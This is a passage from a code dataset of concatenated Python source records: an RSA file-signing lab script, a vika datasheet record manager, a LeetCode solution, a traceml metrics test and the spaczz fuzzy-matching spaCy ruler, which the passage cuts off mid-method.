print('>> Signing [%s] using [%s]' % (file_name, rsa_key_file))\n        rsa_key = RSA.import_key(rsa_key_fd.read())\n        data_hash = SHA256.new(data.read())\n        print('>> File hash:')\n        # print('%s' % data_hash.digest())\n        print('\\n%s\\n' % data_hash.hexdigest())\n        signature = pkcs1_15.new(rsa_key).sign(data_hash)\n\n        signature_file.write(signature)\n        print('>> File signature [data-signature]:')\n        # print('%s' % signature)\n        print('\\n%s\\n' % signature.hex())\n\ndef verify(file_name, rsa_key_file):\n    print('>> Verifying file signature')\n    with open(file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('data_signature', 'rb') as signature_file:\n        print('>> Verifying [%s] using [%s]' % (file_name, rsa_key_file))\n        rsa_key = RSA.import_key(rsa_key_fd.read())\n        data_hash = SHA256.new(data.read())\n        print('>> File hash:')\n        # print('%s' % data_hash.digest())\n        print('\\n%s\\n' % data_hash.hexdigest())\n\n        try:\n            pkcs1_15.new(rsa_key).verify(data_hash, signature_file.read())\n            print('>> Signature is valid!')\n        except (ValueError, TypeError):\n            print('>> Signature is not valid!')\n\narg_parser = argparse.ArgumentParser(description='CSI4139 Lab 1 Part 1')\narg_parser.add_argument('input_file_name', metavar='input', type=str, help='the name of the file to be encrypted')\n\narg_parser.add_argument('-f', '--force_keygen', action='store_true', help='force regeneration of asymmetric keys')\n\nargs = arg_parser.parse_args()\n\ninput_file_name = args.input_file_name\nif not os.path.exists(input_file_name):\n    print('>> Input file does not exist... Exiting...')\n    exit(1)\n\n\ngenerate_keys(args.force_keygen)\nwith open(input_file_name, 'r') as f:\n    print('>> Original file contents of [%s]: \\n\\n%s\\n' % (input_file_name, repr(f.read())))\nsign(input_file_name, 'keys/%s-private' % ASYM_KEY2)\nencrypt_file(input_file_name, 'keys/%s-public' % ASYM_KEY1)\ndecrypt_file('encrypted_data', 'keys/%s-private' % ASYM_KEY1)\nverify('decrypted_data', 'keys/%s-public' % ASYM_KEY2)","sub_path":"lab1/part1/lab1part1.py","file_name":"lab1part1.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542740891","text":"from vika.const import MAX_WRITE_RECORDS_PRE_REQ, MAX_GET_RECORDS_PRE_REQ\nfrom vika.exceptions import RecordDoesNotExist\nfrom vika.datasheet.query_set import QuerySet\nfrom vika.datasheet.record import Record\nfrom vika.types import GETRecordResponse\nfrom vika.utils import query_parse\n\n\nclass RecordManager:\n    def __init__(self, dst: 'Datasheet'):\n        self._dst = dst\n        self._fetched_with = None\n        self._fetched_by = None\n\n    def bulk_create(self, data):\n        \"\"\"\n        Create records in bulk; a single request can create at most 10 records: dst.records.bulk_create([{\"标题\": \"hello vika\"}])\n        @param data: list of record objects [{ \"fieldKey\": fieldValue }, { \"fieldKey\": fieldValue2 }]\n        @return: List[Record]\n        \"\"\"\n        if len(data) > MAX_WRITE_RECORDS_PRE_REQ:\n            raise Exception(f'A single request must not create more than {MAX_WRITE_RECORDS_PRE_REQ} records')\n        resp = self._dst.create_records(data)\n        return [Record(self._dst, record) for record in resp.data.records]\n\n    def create(self, data):\n        \"\"\"\n        Create a single record: dst.records.create({\"标题\": \"hello vika\"})\n        @param data: dict {\"fieldKey\": fieldValue}\n        @return: Record\n        \"\"\"\n        resp = self._dst.create_records(data)\n        if resp.success:\n            records = resp.data.records\n            return Record(self._dst, records[0])\n        raise Exception(resp.message)\n\n    def all(self, **kwargs):\n        \"\"\"\n        Filter records by query conditions; see the get-records query params at https://vika.cn/developers/api-reference#operation/get-records\n        @param kwargs:\n            - viewId: 'viewId1', view ID. Defaults to the first view of the datasheet. The request returns the records after the view's filters/sorting have been applied; combine with the fields param to drop unneeded field data\n            - sort: [{ 'column name or ID': 'asc' }], sorts the records of the given datasheet. An array of \"sort objects\". Supports ascending 'asc' and descending 'desc'. Note: sort conditions passed here override the sort conditions of the view.\n            - recordIds: ['recordId1', 'recordId2'], array of record IDs. If present, only the records specified in the array are returned, in the order they were passed; filters and sorting are ignored. No pagination; at most 1000 records per query\n            - fields: ['标题', '详情', '引用次数'], the fields to return (field names by default; field IDs when fieldKey is set to 'id'). If present, the returned records are filtered down to the specified fields only.\n            - filterByFormula: '{引用次数} > 0', filters records with a formula and returns the matching ones; visit https://vika.cn/help/tutorial-getting-started-with-formulas/ to learn how formulas work\n            - maxRecords: 5000, caps the total number of records returned. If the value is smaller than the actual number of records in the table, the result set is truncated to it.\n            - cellFormat: 'json', the cell value type, 'json' by default; when set to 'string', every value is converted to a string.\n            - fieldKey: 'name', the key used for querying and returning fields. Defaults to the column name 'name'; set to 'id' to query and return by fieldId (using ids protects the code against column renames)\n        @return:\n        \"\"\"\n        _fieldKey = kwargs.get(\"fieldKey\")\n        if _fieldKey and _fieldKey != self._dst.field_key:\n            # TODO: logger warning\n            print(\n                f'It seems that you set field_key when init datasheet, all(fieldKey=\"{_fieldKey}\") will not work'\n            )\n            kwargs.update(fieldKey=self._dst.field_key)\n        if 'pageSize' in kwargs or 'pageNum' in kwargs:\n            resp: GETRecordResponse = self._dst.get_records(**kwargs)\n            if resp.success:\n                records = resp.data.records\n            else:\n                print(f\"[{self._dst.id}] failed to fetch data\\n {resp.message}\")\n                records = []\n        else:\n            records = self._dst.get_records_all(**kwargs)\n        return QuerySet(self._dst, records)\n\n    def get(self, *args, **kwargs):\n        \"\"\"\n        Fetch the single record matching the condition; best used with fields that uniquely identify a record.\n        1. Fetch a record by record id:\n        dst_books.records.get(\"recxxxxxx\")\n        2. Fetch a record by condition:\n        dst_books.records.get(ISBN=\"9787506341271\")\n        @param args:\n        @param kwargs:\n        @return:\n        \"\"\"\n        # look up by record id\n        if args:\n            record_id = args[0]\n            kwargs = {\"recordIds\": [record_id]}\n        elif kwargs:\n            query_formula = query_parse(self._dst.field_key_map, **kwargs)\n            kwargs = {\"filterByFormula\": query_formula}\n        resp: GETRecordResponse = self._dst.get_records(**kwargs)\n        if resp.data.records:\n            return Record(self._dst, resp.data.records[0])\n        raise RecordDoesNotExist()\n\n    def filter(self, **kwargs):\n        \"\"\"\n        Fetch the set of records matching the query conditions:\n        songs = dst_songs.records.filter(artist=\"faye wong\")\n        for song in songs:\n            print(song.title)\n        @param kwargs:\n        @return: QuerySet\n        \"\"\"\n        # When filter is called directly, its query params are converted into filterByFormula so the result is computed server-side\n        records = self._query_records(**kwargs)\n        return QuerySet(self._dst, records)\n\n    def _query_records(self, **kwargs):\n        # Convert the query conditions into filterByFormula and let the server compute the matching record set\n        query_formula = query_parse(self._dst.field_key_map, **kwargs)\n        kwargs = {\"filterByFormula\": query_formula, \"pageSize\": MAX_GET_RECORDS_PRE_REQ}\n        resp: GETRecordResponse = self._dst.get_records(**kwargs)\n        records = resp.data.records\n        # keep paging until every matching record has been fetched\n        while resp.data.pageNum * resp.data.pageSize < resp.data.total:\n            resp = self._dst.get_records(pageNum=resp.data.pageNum + 1, **kwargs)\n            records += resp.data.records\n        return records\n","sub_path":"vika/datasheet/record_manager.py","file_name":"record_manager.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559454097","text":"# O(NlogN) method\nfrom typing import List\n\nclass Solution:\n    def findUnsortedSubarray(self, nums: List[int]) -> int:\n        sorted_nums = sorted(nums)\n        start = len(nums)\n        end = 0\n        \n        for i in range(len(nums)):\n            if nums[i] != sorted_nums[i]:\n                start = min(start,i)\n                end = max(end,i)\n        \n        return max(end - start + 
1,0)\n","sub_path":"581_Shortest_Unsorted_Continuous_Subarray.py","file_name":"581_Shortest_Unsorted_Continuous_Subarray.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"368599","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\n\nfrom polyaxon.utils.test_utils import BaseTestCase\nfrom traceml.processors.events_processors import metrics_dict_to_list\n\n\n@pytest.mark.processors_mark\nclass TestEventWriter(BaseTestCase):\n def test_gpu_resources_to_metrics(self):\n resources = {\n \"gpu_0_memory_free\": 1000,\n \"gpu_0_memory_used\": 8388608000,\n \"gpu_0_utilization\": 76,\n }\n\n events = metrics_dict_to_list(resources)\n assert len(events) == 3\n assert [e.event.metric for e in events] == [1000, 8388608000, 76]\n\n def test_psutil_resources_to_metrics(self):\n resources = {\n \"cpu_percent_avg\": 1000,\n \"cpu_percent_1\": 0.3,\n \"cpu_percent_2\": 0.5,\n \"getloadavg\": 76,\n \"memory_total\": 12883853312,\n \"memory_used\": 8388608000,\n }\n\n events = metrics_dict_to_list(resources)\n assert len(events) == 6\n assert [e.event.metric for e in events] == [\n 1000,\n 0.3,\n 0.5,\n 76,\n 12883853312,\n 8388608000,\n ]\n","sub_path":"traceml/tests/test_events_processing/test_event_resources.py","file_name":"test_event_resources.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95139628","text":"\"\"\"Module for spaCy v3 compatible SpaczzRuler.\"\"\"\nfrom __future__ import annotations\n\nfrom collections import defaultdict\nfrom itertools import chain\nfrom logging import exception\nfrom pathlib import Path\nfrom typing import (\n Any,\n Callable,\n DefaultDict,\n Dict,\n Iterable,\n List,\n Optional,\n Set,\n Tuple,\n Union,\n)\nimport warnings\n\ntry:\n from spacy.language import Language\n from spacy.pipeline import Pipe\n from spacy.scorer import get_ner_prf\n from spacy.tokens import Doc, Span\n from spacy.training import Example, validate_examples\n from spacy.util import SimpleFrozenDict, SimpleFrozenList\nexcept ImportError: # pragma: no cover\n raise ImportError(\n (\n \"Trying to import spaCy v3 compatible SpaczzRuler from spaCy v2.\",\n \"Please upgrade or use the SpaczzRuler in _spaczzruler-legacy\",\n )\n )\nimport srsly\n\nfrom ..exceptions import PatternTypeWarning\nfrom ..matcher import FuzzyMatcher, RegexMatcher, TokenMatcher\nfrom ..regex import RegexConfig\nfrom ..util import ensure_path, nest_defaultdict, read_from_disk, write_to_disk\n\n\nDEFAULT_ENT_ID_SEP = \"||\"\nsimple_frozen_dict = SimpleFrozenDict()\nsimple_frozen_list = SimpleFrozenList()\n\n\n@Language.factory(\n \"spaczz_ruler\",\n assigns=[\"doc.ents\", \"token.ent_type\", \"token.ent_iob\"],\n default_config={\n \"overwrite_ents\": False,\n \"ent_id_sep\": DEFAULT_ENT_ID_SEP,\n \"fuzzy_defaults\": simple_frozen_dict,\n 
\"regex_defaults\": simple_frozen_dict,\n \"token_defaults\": simple_frozen_dict,\n },\n default_score_weights={\n \"ents_f\": 1.0,\n \"ents_p\": 0.0,\n \"ents_r\": 0.0,\n \"ents_per_type\": None,\n },\n)\ndef make_spaczz_ruler(\n # typing nlp with Language causes issue with Pydantic in spaCy integration\n nlp: Any,\n name: str,\n overwrite_ents: bool,\n ent_id_sep: str,\n fuzzy_defaults: Dict[str, Any],\n regex_defaults: Dict[str, Any],\n token_defaults: Dict[str, Any],\n) -> SpaczzRuler:\n \"\"\"Factory method for creating a `SpaczzRuler`.\"\"\"\n return SpaczzRuler(\n nlp,\n name,\n overwrite_ents=overwrite_ents,\n ent_id_sep=ent_id_sep,\n fuzzy_defaults=fuzzy_defaults,\n regex_defaults=regex_defaults,\n token_defaults=token_defaults,\n )\n\n\nclass SpaczzRuler(Pipe):\n \"\"\"The `SpaczzRuler` adds fuzzy and multi-token regex matches to spaCy `Doc.ents`.\n\n It can be combined with other spaCy NER components like the statistical\n `EntityRecognizer` and/or the `EntityRuler` to boost accuracy.\n After initialization, the component is typically added to the pipeline\n using `nlp.add_pipe`.\n\n Attributes:\n nlp: The shared nlp object to pass the vocab to the matchers\n (not currently used by spaczz matchers) and process fuzzy patterns.\n fuzzy_patterns:\n Patterns added to the fuzzy matcher.\n regex_patterns:\n Patterns added to the regex matcher.\n token_patterns:\n Patterns added to the token matcher\n fuzzy_matcher: The `FuzzyMatcher` instance\n the spaczz ruler will use for fuzzy phrase matching.\n regex_matcher: The `RegexMatcher` instance\n the spaczz ruler will use for regex phrase matching.\n token_matcher: The `TokenMatcher` instance\n the spaczz ruler will use for token matching.\n defaults: Default matching settings for their respective matchers.\n \"\"\"\n\n name = \"spaczz_ruler\"\n\n def __init__(\n self: SpaczzRuler,\n nlp: Language,\n name: str = \"spaczz_ruler\",\n *,\n overwrite_ents: bool = False,\n ent_id_sep: str = DEFAULT_ENT_ID_SEP,\n fuzzy_defaults: Dict[str, Any] = simple_frozen_dict,\n regex_defaults: Dict[str, Any] = simple_frozen_dict,\n token_defaults: Dict[str, Any] = simple_frozen_dict,\n regex_config: Union[str, RegexConfig] = \"default\",\n patterns: Optional[Iterable[Dict[str, Any]]] = None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Initialize the spaczz ruler.\n\n If `patterns` is supplied here, it needs to be an iterable of spaczz patterns:\n dictionaries with `\"label\"`, `\"pattern\"`, and `\"type\"` keys.\n If the patterns are fuzzy or regex phrase patterns\n they can include the optional `\"kwargs\"` keys.\n\n For example, a fuzzy phrase pattern:\n `{'label': 'ORG', 'pattern': 'Apple',\n 'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`\n\n Or, a token pattern:\n `{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`\n\n Prior to spaczz v0.5, optional parameters had to be prepended with \"spaczz_\"\n to prevent potential conflicts with other spaCy components.\n As of spaCy v3 this is no longer an issue so prepending optional parameters\n with \"spaczz_\" is no longer necessary.\n\n\n Args:\n nlp: The shared `Language` object to pass the vocab to the matchers\n and process fuzzy patterns.\n name: Instance name of the current pipeline component. Typically\n passed in automatically from the factory when the component is\n added. Used to disable the current entity ruler while creating\n phrase patterns with the nlp object.\n overwrite_ents: If existing entities are present, e.g. 
entities\n added by the model, overwrite them by matches if necessary.\n Default is `False`.\n ent_id_sep: Separator used internally for entity IDs.\n fuzzy_defaults: Modified default parameters to use with the `FuzzyMatcher`.\n Default is `None`.\n regex_defaults: Modified default parameters to use with the `RegexMatcher`.\n Default is `None`.\n token_defaults: Modified default parameters to use with the `TokenMatcher`.\n Default is `None`.\n regex_config: Should largely be ignored as an artifact of an old spaczz\n design pattern. Will likely be updated in the future.\n Default is `\"default\"`.\n patterns: Optional patterns to load in. Default is `None`.\n kwargs: For backwards compatibility with \"spaczz_\" prepended parameters.\n\n Raises:\n TypeError: If matcher defaults passed are not dictionaries.\n \"\"\"\n self.nlp = nlp\n self.name = name\n self.overwrite = kwargs.get(\"spaczz_overwrite_ents\", overwrite_ents)\n self.fuzzy_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(\n list, 2\n )\n self.regex_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(\n list, 2\n )\n self.token_patterns: DefaultDict[str, List[List[Dict[str, Any]]]] = defaultdict(\n list\n )\n self.ent_id_sep = kwargs.get(\"spaczz_ent_id_sep\", ent_id_sep)\n self._ent_ids: DefaultDict[Any, Any] = defaultdict(dict)\n self.defaults = {}\n default_names = (\n \"fuzzy_defaults\",\n \"regex_defaults\",\n \"token_defaults\",\n )\n fuzzy_defaults = kwargs.get(\"spaczz_fuzzy_defaults\", fuzzy_defaults)\n regex_defaults = kwargs.get(\"spaczz_regex_defaults\", regex_defaults)\n token_defaults = kwargs.get(\"spaczz_token_defaults\", token_defaults)\n for default, name in zip(\n (fuzzy_defaults, regex_defaults, token_defaults), default_names\n ):\n if isinstance(default, dict):\n self.defaults[name] = default\n else:\n raise TypeError(\n (\n \"Defaults must be a dictionary of keyword arguments,\",\n f\"not {type(default)}.\",\n )\n )\n self.fuzzy_matcher = FuzzyMatcher(nlp.vocab, **self.defaults[\"fuzzy_defaults\"])\n self.regex_matcher = RegexMatcher(\n nlp.vocab, regex_config, **self.defaults[\"regex_defaults\"]\n )\n self.token_matcher = TokenMatcher(nlp.vocab, **self.defaults[\"token_defaults\"])\n patterns = kwargs.get(\"spaczz_patterns\", patterns)\n if patterns is not None:\n self.add_patterns(patterns)\n\n def __call__(self: SpaczzRuler, doc: Doc) -> Doc:\n \"\"\"Find matches in document and add them as entities.\n\n Args:\n doc: The Doc object in the pipeline.\n\n Returns:\n The Doc with added entities, if available.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> doc = nlp.make_doc(\"My name is Anderson, Grunt\")\n >>> ruler.add_patterns([{\"label\": \"NAME\", \"pattern\": \"Grant Andersen\",\n \"type\": \"fuzzy\", \"kwargs\": {\"fuzzy_func\": \"token_sort\"}}])\n >>> doc = ruler(doc)\n >>> \"Anderson, Grunt\" in [ent.text for ent in doc.ents]\n True\n \"\"\"\n error_handler = self.get_error_handler()\n try:\n matches, lookup = self.match(doc)\n self.set_annotations(doc, matches, lookup)\n return doc\n except exception as e: # type: ignore\n error_handler(self.name, self, [doc], e)\n\n def __contains__(self: SpaczzRuler, label: str) -> bool:\n \"\"\"Whether a label is present in the patterns.\"\"\"\n return (\n label in self.fuzzy_patterns\n or label in self.regex_patterns\n or label in self.token_patterns\n )\n\n def __len__(self: SpaczzRuler) -> int:\n \"\"\"The number of all 
patterns added to the ruler.\"\"\"\n n_fuzzy_patterns = sum(len(p[\"patterns\"]) for p in self.fuzzy_patterns.values())\n n_regex_patterns = sum(len(p[\"patterns\"]) for p in self.regex_patterns.values())\n n_token_patterns = sum(len(p) for p in self.token_patterns.values())\n return n_fuzzy_patterns + n_regex_patterns + n_token_patterns\n\n @property\n def ent_ids(self: SpaczzRuler) -> Tuple[Optional[str], ...]:\n \"\"\"All entity ids present in the match patterns id properties.\n\n Returns:\n The unique string entity ids as a tuple.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\", \"id\": \"BEAT\"}])\n >>> ruler.ent_ids\n ('BEAT',)\n \"\"\"\n keys = set(self.fuzzy_patterns.keys())\n keys.update(self.regex_patterns.keys())\n keys.update(self.token_patterns.keys())\n all_ent_ids = set()\n\n for k in keys:\n if self.ent_id_sep in k:\n _, ent_id = self._split_label(k)\n all_ent_ids.add(ent_id)\n all_ent_ids_tuple = tuple(all_ent_ids)\n return all_ent_ids_tuple\n\n @property\n def labels(self: SpaczzRuler) -> Tuple[str, ...]:\n \"\"\"All labels present in the ruler.\n\n Returns:\n The unique string labels as a tuple.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> ruler.labels\n ('AUTHOR',)\n \"\"\"\n keys = set(self.fuzzy_patterns.keys())\n keys.update(self.regex_patterns.keys())\n keys.update(self.token_patterns.keys())\n all_labels = set()\n for k in keys:\n if self.ent_id_sep in k:\n label, _ = self._split_label(k)\n all_labels.add(label)\n else:\n all_labels.add(k)\n return tuple(all_labels)\n\n @property\n def patterns(self: SpaczzRuler) -> List[Dict[str, Any]]:\n \"\"\"Get all patterns and kwargs that were added to the ruler.\n\n Returns:\n The original patterns and kwargs, one dictionary for each combination.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"STREET\", \"pattern\": \"street_addresses\",\n \"type\": \"regex\", \"kwargs\": {\"predef\": True}}])\n >>> ruler.patterns == [\n {\n \"label\": \"STREET\",\n \"pattern\": \"street_addresses\",\n \"type\": \"regex\",\n \"kwargs\": {\"predef\": True},\n },\n ]\n True\n \"\"\"\n all_patterns = []\n for label, fuzzy_patterns in self.fuzzy_patterns.items():\n for fuzzy_pattern, fuzzy_kwargs in zip(\n fuzzy_patterns[\"patterns\"], fuzzy_patterns[\"kwargs\"]\n ):\n ent_label, ent_id = self._split_label(label)\n p = {\"label\": ent_label, \"pattern\": fuzzy_pattern.text, \"type\": \"fuzzy\"}\n if fuzzy_kwargs:\n p[\"kwargs\"] = fuzzy_kwargs\n if ent_id:\n p[\"id\"] = ent_id\n all_patterns.append(p)\n for label, regex_patterns in self.regex_patterns.items():\n for regex_pattern, regex_kwargs in zip(\n regex_patterns[\"patterns\"], regex_patterns[\"kwargs\"]\n ):\n ent_label, ent_id = self._split_label(label)\n p = {\"label\": ent_label, \"pattern\": regex_pattern, \"type\": \"regex\"}\n if regex_kwargs:\n p[\"kwargs\"] = regex_kwargs\n if ent_id:\n p[\"id\"] = ent_id\n all_patterns.append(p)\n for label, token_patterns in self.token_patterns.items():\n for token_pattern in token_patterns:\n ent_label, ent_id = 
self._split_label(label)\n p = {\"label\": ent_label, \"pattern\": token_pattern, \"type\": \"token\"}\n if ent_id:\n p[\"id\"] = ent_id\n all_patterns.append(p)\n return all_patterns\n\n def add_patterns(\n self: SpaczzRuler,\n patterns: Iterable[Dict[str, Any]],\n ) -> None:\n \"\"\"Add patterns to the ruler.\n\n A pattern must be a spaczz pattern:\n `{label (str), pattern (str or list), type (str),\n optional kwargs (dict[str, Any]), and optional id (str)}`.\n\n For example, a fuzzy phrase pattern:\n `{'label': 'ORG', 'pattern': 'Apple',\n 'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`\n\n Or, a token pattern:\n `{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`\n\n To utilize regex flags, use inline flags.\n\n Kwarg details to be updated.\n\n Args:\n patterns: The spaczz patterns to add.\n\n Raises:\n TypeError: If patterns is not an iterable of dictionaries.\n ValueError: If one or more patterns do not conform\n the spaczz pattern structure.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> \"AUTHOR\" in ruler.labels\n True\n \"\"\"\n # disable the nlp components after this one in case\n # they hadn't been initialized / deserialised yet\n try:\n current_index = -1\n for i, (_name, pipe) in enumerate(self.nlp.pipeline):\n if self == pipe:\n current_index = i\n break\n subsequent_pipes = [\n pipe for pipe in self.nlp.pipe_names[current_index + 1 :]\n ]\n except ValueError:\n subsequent_pipes = []\n with self.nlp.select_pipes(disable=subsequent_pipes):\n token_patterns = []\n fuzzy_pattern_labels = []\n fuzzy_pattern_texts = []\n fuzzy_pattern_kwargs = []\n fuzzy_pattern_ids = []\n regex_pattern_labels = []\n regex_pattern_texts = []\n regex_pattern_kwargs = []\n regex_pattern_ids = []\n\n for entry in patterns:\n try:\n if isinstance(entry, dict):\n if entry[\"type\"] == \"fuzzy\":\n fuzzy_pattern_labels.append(entry[\"label\"])\n fuzzy_pattern_texts.append(entry[\"pattern\"])\n fuzzy_pattern_kwargs.append(entry.get(\"kwargs\", {}))\n fuzzy_pattern_ids.append(entry.get(\"id\"))\n elif entry[\"type\"] == \"regex\":\n regex_pattern_labels.append(entry[\"label\"])\n regex_pattern_texts.append(entry[\"pattern\"])\n regex_pattern_kwargs.append(entry.get(\"kwargs\", {}))\n regex_pattern_ids.append(entry.get(\"id\"))\n elif entry[\"type\"] == \"token\":\n token_patterns.append(entry)\n else:\n warnings.warn(\n f\"\"\"Spaczz pattern \"type\" must be \"fuzzy\", \"regex\",\n or \"token\", not {entry[\"type\"]}. 
Skipping this pattern.\n \"\"\",\n PatternTypeWarning,\n )\n else:\n raise TypeError(\n (\"Patterns must either be an iterable of dicts.\")\n )\n except KeyError:\n raise ValueError(\n (\n \"One or more patterns do not conform\",\n \"to spaczz pattern structure: \",\n \"{label (str), pattern (str or list), type (str),\",\n \"optional kwargs (dict[str, Any]),\",\n \"and optional id (str)}.\",\n )\n )\n\n fuzzy_patterns = []\n for label, pattern, kwargs, ent_id in zip(\n fuzzy_pattern_labels,\n self.nlp.pipe(fuzzy_pattern_texts),\n fuzzy_pattern_kwargs,\n fuzzy_pattern_ids,\n ):\n fuzzy_pattern = {\n \"label\": label,\n \"pattern\": pattern,\n \"kwargs\": kwargs,\n \"type\": \"fuzzy\",\n }\n if ent_id:\n fuzzy_pattern[\"id\"] = ent_id\n fuzzy_patterns.append(fuzzy_pattern)\n\n regex_patterns = []\n for label, pattern, kwargs, ent_id in zip(\n regex_pattern_labels,\n regex_pattern_texts,\n regex_pattern_kwargs,\n regex_pattern_ids,\n ):\n regex_pattern = {\n \"label\": label,\n \"pattern\": pattern,\n \"kwargs\": kwargs,\n \"type\": \"regex\",\n }\n if ent_id:\n regex_pattern[\"id\"] = ent_id\n regex_patterns.append(regex_pattern)\n\n self._add_patterns(fuzzy_patterns, regex_patterns, token_patterns)\n\n def clear(self: SpaczzRuler) -> None:\n \"\"\"Reset all patterns.\"\"\"\n self.fuzzy_patterns = nest_defaultdict(list, 2)\n self.regex_patterns = nest_defaultdict(list, 2)\n self.token_patterns = defaultdict(list)\n self._ent_ids = defaultdict(dict)\n\n def initialize(\n self: SpaczzRuler,\n get_examples: Callable[[], Iterable[Example]],\n *,\n nlp: Optional[Language] = None,\n patterns: Optional[Iterable[Dict[str, Any]]] = None,\n ) -> None:\n \"\"\"Initialize the pipe for training.\n\n Args:\n get_examples: Function that returns a representative sample\n of gold-standard Example objects.\n nlp: The current nlp object the component is part of.\n patterns: The list of patterns.\n \"\"\"\n self.clear()\n if patterns:\n self.add_patterns(patterns)\n\n def match(\n self: SpaczzRuler, doc: Doc\n ) -> Tuple[\n List[Tuple[str, int, int]],\n DefaultDict[str, Dict[Tuple[str, int, int], Any]],\n ]:\n \"\"\"Used in call to find matches in a doc.\"\"\"\n fuzzy_matches = []\n lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]] = defaultdict(dict)\n for fuzzy_match in self.fuzzy_matcher(doc):\n current_ratio = fuzzy_match[3]\n best_ratio = lookup[\"ratios\"].get(fuzzy_match[:3], 0)\n if current_ratio > best_ratio:\n fuzzy_matches.append(fuzzy_match[:3])\n lookup[\"ratios\"][fuzzy_match[:3]] = current_ratio\n regex_matches = []\n for regex_match in self.regex_matcher(doc):\n current_counts = regex_match[3]\n best_counts = lookup[\"counts\"].get(regex_match[:3])\n if not best_counts or sum(current_counts) < sum(best_counts):\n regex_matches.append(regex_match[:3])\n lookup[\"counts\"][regex_match[:3]] = current_counts\n token_matches = []\n for token_match in self.token_matcher(doc):\n token_matches.append(token_match[:3])\n lookup[\"details\"][token_match[:3]] = 1\n matches = fuzzy_matches + regex_matches + token_matches\n unique_matches, lookup = self._filter_overlapping_matches(matches, lookup)\n return unique_matches, lookup\n\n def score(self: SpaczzRuler, examples: Any, **kwargs: Any) -> Any:\n \"\"\"Pipeline scoring for spaCy compatibility.\"\"\"\n validate_examples(examples, \"SpaczzRuler.score\")\n return get_ner_prf(examples)\n\n def set_annotations(\n self: SpaczzRuler,\n doc: Doc,\n matches: List[Tuple[str, int, int]],\n lookup: DefaultDict[\n str, Dict[Tuple[str, int, int], Union[int, 
Tuple[int, int, int]]]\n ],\n ) -> None:\n \"\"\"Modify the document in place.\"\"\"\n entities = list(doc.ents)\n new_entities = []\n seen_tokens: Set[int] = set()\n for match_id, start, end in matches:\n if any(t.ent_type for t in doc[start:end]) and not self.overwrite:\n continue\n # check for end - 1 here because boundaries are inclusive\n if start not in seen_tokens and end - 1 not in seen_tokens:\n if match_id in self._ent_ids:\n label, ent_id = self._ent_ids[match_id]\n span = Span(doc, start, end, label=label)\n if ent_id:\n for token in span:\n token.ent_id_ = ent_id\n else:\n span = Span(doc, start, end, label=match_id)\n span = self._update_custom_attrs(span, match_id, lookup)\n new_entities.append(span)\n entities = [\n e for e in entities if not (e.start < end and e.end > start)\n ]\n seen_tokens.update(range(start, end))\n doc.ents = entities + new_entities\n\n def from_bytes(\n self: SpaczzRuler,\n patterns_bytes: bytes,\n *,\n exclude: Iterable[str] = simple_frozen_list,\n ) -> SpaczzRuler:\n \"\"\"Load the spaczz ruler from a bytestring.\n\n Args:\n patterns_bytes : The bytestring to load.\n exclude: For spaCy consistency.\n\n Returns:\n The loaded spaczz ruler.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> ruler_bytes = ruler.to_bytes()\n >>> new_ruler = SpaczzRuler(nlp)\n >>> new_ruler = new_ruler.from_bytes(ruler_bytes)\n >>> \"AUTHOR\" in new_ruler\n True\n \"\"\"\n cfg = srsly.msgpack_loads(patterns_bytes)\n self.clear()\n if isinstance(cfg, dict):\n self.add_patterns(cfg.get(\"patterns\", cfg))\n self.defaults = cfg.get(\"defaults\", {})\n if self.defaults.get(\"fuzzy_defaults\"):\n 